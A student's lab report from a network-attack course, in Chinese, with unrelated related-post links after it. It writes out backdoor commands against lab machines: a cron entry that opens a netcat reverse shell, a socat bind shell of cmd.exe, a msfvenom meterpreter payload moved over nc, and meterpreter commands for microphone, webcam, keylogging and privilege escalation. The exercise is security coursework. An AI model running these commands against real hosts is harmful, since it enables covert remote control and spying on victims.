20155312 张竞予 Exp2 后门原理与实践
Exp2 后门原理与实践
目录
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
可能是我们点开某个链接的时候,自动加载了某个可执行文件,就类似于执行了实验中传入到windows中的backdoor.exe;也可能是我们点开某个网页时,该网页通过木马的方式在我们不知情的情况下自动下载了某个后门文件。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
- linux中可能crontab文件被修改,周期性(定时)反向连接控制主机,只要控制主机保持侦听状态,就可以周期性启动后门,控制被控主机。
- windows中可能是被动下载、接收了后门程序,当被控端点击运行该程序时,后门便会启动。
(3)Meterpreter有哪些给你映像深刻的功能?
能够获取被控主机的麦克风录音、获取被控主机的摄像头拍照和录像。
(4)如何发现自己有系统有没有被安装后门?
利用防火墙,在防火墙看开启的端口及对应的进程,一般不是系统默认开启的端口都是可疑的,要找一下对应的进程,找到对应进程,对相应进程进行抓包,看他通信的数据,分析是不是后门。
定期用360管家等软件对系统进行检测,及时处理疑似病毒、木马的程序。
实践过程记录
一、使用netcat获取主机操作Shell,cron启动
首先查看WindowsIP和LinuxIP:
- Windows下用命令
ipconfig
:
- Linux下用
ifconfig -a
Windows获得linux的shell:
cron启动过程如下:
- 先在Windows系统下,监听8888端口
- 在Kali环境下,用
crontab -e
指令编辑一条定时任务,选择编辑器时选择"3"; - 在最后一行添加
09 * * * * /bin/netcat 192.168.199.196 8888 -e /bin/sh
,意思是在每个小时的第37分钟反向连接Windows主机的8888端口,设置成09的原因是我当时的时间是11点07,为了能立马看到效果,所以我将时间设置成了“09”(注意这里的IP地址应该为控制主机的IP);
4.最后运行结果如下所示:
二、使用socat获取主机操作Shell, 任务计划启动
1.Windows+X,然后选择“控制面板”(win8下打开控制面板)
2.右上角“查看方式”选择“大图标”
3.点击管理程序->点击任务计划程序
4.选择上方菜单栏中的“操作”->“创建任务”
5.输入任务名
6.新建触发器,在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:8888 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口8888,同时把cmd.exe的stderr重定向到stdout上
7.创建完成之后,按Windows+L快捷键锁定计算机,再次打开时,可以发现之前创建的任务已经开始运行
8.socat - tcp:192.168.199.196:8888,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的8888端口,此时可以发现已经成功获得了一个cmd shell:(此处的IP地址为WindowsIP)
三、使用MSF meterpreter(或其他软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.在Kali上执行指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.217.128 LPORT=8888 -f exe > 20155312_backdoor.exe
,注意这里的IP地址为控制端IP,即LinuxIP,可见已经生成了后门程序“20155312_backdoor.exe”
2.在Windows下执行ncat.exe -l 8888 > 20155312_backdoor.exe
,这样被控主机就进入了接收文件模式
3.在Linux中执行nc 192.168.199.196 8888 < 20155312_backdoor.exe
,注意这里的IP为被控主机IP,即WindowsIP
4.传送接收文件成功,如下图所示:
5.在Kali中打开一个终端,使用msfconsole
指令进入msf控制台
6.接着输入use exploit/multi/handler使用监听模块,设置payload
7.set payload windows/meterpreter/reverse_tcp
,使用和生成后门程序时相同的payload
8.set LHOST 192.168.20.136
,这里用的是LinuxIP,和生成后门程序时指定的IP相同
9.set LPORT 8888
,同样要使用相同的端口
10.开始监听
四、使用MSF meterpreter(或其他软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic指令可以截获一段音频:(可以+“-d 时间”来设定录制时间)
2.使用webcam_snap指令可以使用摄像头进行拍照:
3.使用keyscan_start指令开始记录下击键的过程,使用keyscan_dump指令读取击键的记录:
4.先使用getuid指令查看当前用户,使用getsystem指令进行提权,由于是Win8系统,提权失败:
5.其他操作:
- 使用screenshot指令可以进行截屏
- 用webcam stream指令可以使用摄像头进行录像
- ……
实验总结与体会
通过本次实验,我学会了如果对linux和windows植入后门,包括开启侦听、反向连接、生成后门程序、传送后门程序、控制被控主机、修改定时任务列表、使用socat获取主机操作Shell等。在动手实验的过程中既体会到了作为攻击者的乐趣,更加深刻的体会到了使用计算机时增强安全意识的重要性。平时上网的时候,一定要注意不点击不靠谱链接,下载软件时尽量选择官网下载,防止下载盗版软件时被捆绑下载其他后门程序。
20155312 张竞予 Exp2 后门原理与实践的更多相关文章
- 20155325 Exp2 后门原理与实践
基础问答 例举你能想到的一个后门进入到你系统中的可能方式? 乱点链接 学电脑小白不正确配置电脑 下载非官网软件 例举你知道的后门如何启动起来(win及linux)的方式? 软件:ncat socat ...
- 2019-2020-3 20174318张致豪《网络对抗技术》Exp2 后门原理与实践
Exp2 后门原理与实践 前期准备 一.实验目标与基础知识 1.1 实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell,任务计划启动 使用MSF m ...
- 2018-2019-2 20165237《网络对抗技术》Exp2 后门原理与实践
2018-2019-2 20165237<网络对抗技术>Exp2 后门原理与实践 一.实践目标 使用netcat获取主机操作Shell,cron启动 使用socat获取主机操作Shell, ...
- Exp2 后门原理与实践 20165110
Exp2 后门原理与实践 一.实验要求 1.使用netcat获取主机操作Shell,cron启动 2.使用socat获取主机操作Shell, 任务计划启动 3.使用MSF meterpreter(或其 ...
- 20145331魏澍琛《网络对抗》Exp2 后门原理与实践
20145331魏澍琛<网络对抗>Exp2 后门原理与实践 基础问题回答 (1)例举你能想到的一个后门进入到你系统中的可能方式? 上网时候弹出一个广告说你中奖了,或者你可以贷款10万元之类 ...
- 2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165232 Exp2 后门原理与实践 1. 后门原理与实践实验说明及预备知识 一.实验说明 任务一:使用netcat获取主机操作Shell,cron启动 ( ...
- 20155324《网络对抗》Exp2 后门原理与实践
20155324<网络对抗>Exp2 后门原理与实践 20155324<网络对抗>Exp2 后门原理与实践 常用后门工具实践 Windows获得Linux Shell 在Win ...
- 2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165325 Exp2 后门原理与实践 实验内容(概要): (1)使用netcat获取主机Shell,cron启动 首先两个电脑(虚拟机)都得有netcat, ...
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践
- 2018-2019-2 网络对抗技术 20165206 Exp2 后门原理与实践 - 实验任务 (1)使用netcat获取主机操作Shell,cron启动 (0.5分) (2)使用socat获取主 ...
随机推荐
- springboot+vue前后端分离,nginx代理配置 tomcat 部署war包详细配置
1.做一个小系统,使用了springboot+vue 基础框架参考这哥们的,直接拿过来用,链接https://github.com/smallsnail-wh/interest 前期的开发环境搭建就不 ...
- C语言语法
1.函数指针类型定义,然后指针结构体类型定义,最后的调用形式为aaa.bbb();(aaa为结构体变量)或者 aaa->bbb();(aaa为结构体指针),函数指针最好用结构体封装起来变成指针结 ...
- card布局解决复杂操作的布局问题
一直不是很待见直接使用card布局,直到对于一些稍微复杂点的业务, 通过border布局和弹窗体的方式解决特别费劲之后,才想起了card布局, 发现card布局真是一个很好的解决办法. 那个使用起来很 ...
- Interlij idea
https://blog.csdn.net/qq_30180559/article/details/79146795 http://baijiahao.baidu.com/s?id=157736618 ...
- celery (二) task调用
调用 TASK 基础 task 的调用方式有三种: 类似普通函数的调用方式, 通过 __calling__ 调用 ,类似 function() 通过 apply_async() 调用,能接受较多的参数 ...
- 初始IP协议
一.引言 发送一段TCP数据大致需要经过:用户封装 –> TCP封装 –> IP封装 –>帧封装 Note:用户封装没啥好说的,都是客户自己决定的,在一些简单的应用情况下,这个步骤可 ...
- HTTP协议中request和response常用方法
一.request的常用方法:1.获取请求的方式 getMethod()2.目录的路径 getContextPath()3.获取servlet路径 getServletString()4.获得get请 ...
- rhce 第十题 配置NFS服务
配置NFS服务 在system1配置NFS服务,要求如下: 以只读的方式共享目录/public,同时只能被group8.example.com域中的系统访问 以读写的方式共享目录/protected, ...
- CSL 的神奇序列(猜猜猜?)
链接:https://ac.nowcoder.com/acm/contest/551/F来源:牛客网 时间限制:C/C++ 2秒,其他语言4秒 空间限制:C/C++ 524288K,其他语言10485 ...
- c#: .net framework 2.0支持扩展方法的办法
c#之扩展方法是个好方法,可惜只在.net framework 3.5及以上版本中用. 2.0版本若用,其编译报错如下: 错误 无法定义新的扩展方法,因为找不到编译器所需的类型“System.Runt ...